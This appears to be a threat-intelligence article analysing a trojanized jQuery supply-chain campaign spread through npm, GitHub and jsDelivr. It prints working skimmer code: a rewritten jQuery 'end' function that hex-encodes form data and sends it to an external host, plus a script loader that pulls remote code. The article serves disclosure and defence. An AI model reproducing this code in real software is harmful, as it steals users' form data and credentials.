Learn about the sophisticated supply chain attack involving a trojanized version of jQuery discovered by Phylum, affecting npm, GitHub, and jsDelivr.

Continue reading
Security researchers at a software supply chain security firm have recently identified a persistent supply chain attack targeting the popular JavaScript library jQuery.
This malicious campaign involves the distribution of trojanized jQuery versions via npm, GitHub, and CDNs. The compromised jQuery versions are crafted to steal user form data, posing a critical threat to developers and website users.
This Threatfeed aims to provide an in-depth analysis of the attack, its methodology, implications, and preventive actionable steps.
Since May 26, 2024, Phylum has been monitoring this supply chain attack. The attacker has been publishing trojanized versions of jQuery in dozens of npm packages.
These packages were also discovered on GitHub and as CDN-hosted resources on jsDelivr. The attack is characterized by its high variability and manual assembly, indicating a sophisticated and persistent effort.
The core of this attack involves the modification of the jQuery library. Specifically, the `end` function of the jQuery prototype is altered to include malicious code. Below is the comparison of the legitimate and trojanized `end` function:
// Legitimate jQuery end function
end: function () {
return this.prevObject || this.constructor();
}// Trojanized jQuery end function
end: async function () {
await $.ajax({
url: "https://anti-spam.truex.biz.id/halo/?cat=" + (function (e) {
for (var t, n = 0, r = e.length, i = ""; n < r; ++n)
i += (t = e.charCodeAt(n).toString(16)).length < 2 ? "0" + t : t;
return i;
})($("form").serialize()),
type: "GET",
dataType: "text",
headers: { "Content-type": "application/json" },
});
}The trojanized version sends serialized form data to a remote server whenever the `end` function is called. This modification is subtle and hard to detect without thorough code review.
The malicious code is triggered under specific conditions:
The attacker has distributed the trojanized jQuery through various npm accounts and GitHub repositories. They have cleverly concealed the malicious code within legitimate-looking packages. Examples of these packages include `jquery.min.js`, `registration.min.js`, and `icon.min.js`.
Each package includes unique exfiltration URLs, suggesting a highly personalized attack strategy. Additionally, these packages contain personal files, such as npm cache folders and logs, indicating manual assembly.
The exfiltration mechanism leverages jQuery’s `ajax` method to send form data to remote servers. The data is serialized and encoded in hex, making it difficult to identify without detailed analysis. Below is the snippet demonstrating this mechanism:
url: "https://anti-spam.truex.biz.id/halo/?cat=" + (function (e) {
for (var t, n = 0, r = e.length, i = ""; n < r; ++n)
i += (t = e.charCodeAt(n).toString(16)).length < 2 ? "0" + t : t;
return i;
})($("form").serialize())!function (e) {
var t = ["[ionicons] Deprecated script, please remove: " + (s = e.scripts[e.scripts.length - 1]).outerHTML];
t.push("To improve performance it is recommended to set the differential scripts in the head as follows:");
var n = s.src.split("/");
n.pop();
n.push("ionicons");
var s;
n.join("/");
(s = e.createElement("script")).setAttribute("type", "module"), s.src = "https://unpkg.com/[email protected]/dist/ionicons/ionicons.esm.js",
t.push(s.outerHTML),
s.setAttribute("data-stencil-namespace", "ionicons"),
e.head.appendChild(s),
(s = e.createElement("script")).setAttribute("nomodule", ""),
s.src = "https://unpkg.com/[email protected]/dist/ionicons/ionicons.js",
t.push(s.outerHTML),
s.setAttribute("data-stencil-namespace", "ionicons"),
e.head.appendChild(s),
console.warn(t.join("\n"))
}(document),
function () {
var e = document.createElement("script");
e.type = "text/javascript";
e.src = "https://cdn.jsdelivr.net/gh/indexsc/libs/slim.js";
document.body.appendChild(e);
}();The primary risk of this attack is the unauthorized exfiltration of user data, including login credentials and other sensitive information. Websites using the trojanized jQuery are vulnerable to data breaches, potentially leading to significant financial and reputational damage.
Developers who unknowingly integrate these malicious packages into their projects are at risk of compromising their users’ data. This attack underscores the importance of verifying the integrity of third-party libraries and packages.
To mitigate this threat, developers should update all npm packages relying on jQuery to the latest, verified versions. Regular updates ensure that any known vulnerabilities are patched promptly.
Conducting thorough audits of third-party code is essential. Developers should review the functionality and origin of code hosted on platforms like GitHub before integrating it into their projects. Automated tools can assist in identifying suspicious code modifications.
Phylum’s detailed blog post on the trojanized jQuery attack provides additional insights and recommendations for developers and security researchers.
By adhering to these practices, developers can significantly reduce the risk of falling victim to supply chain attacks like the one involving trojanized jQuery.

A single ClickFix infrastructure is pushing StealC, Amatera, Remus, NetSupport, CastleLoader and a new loader called ResiLoader through fake Google/Cloudflare checks.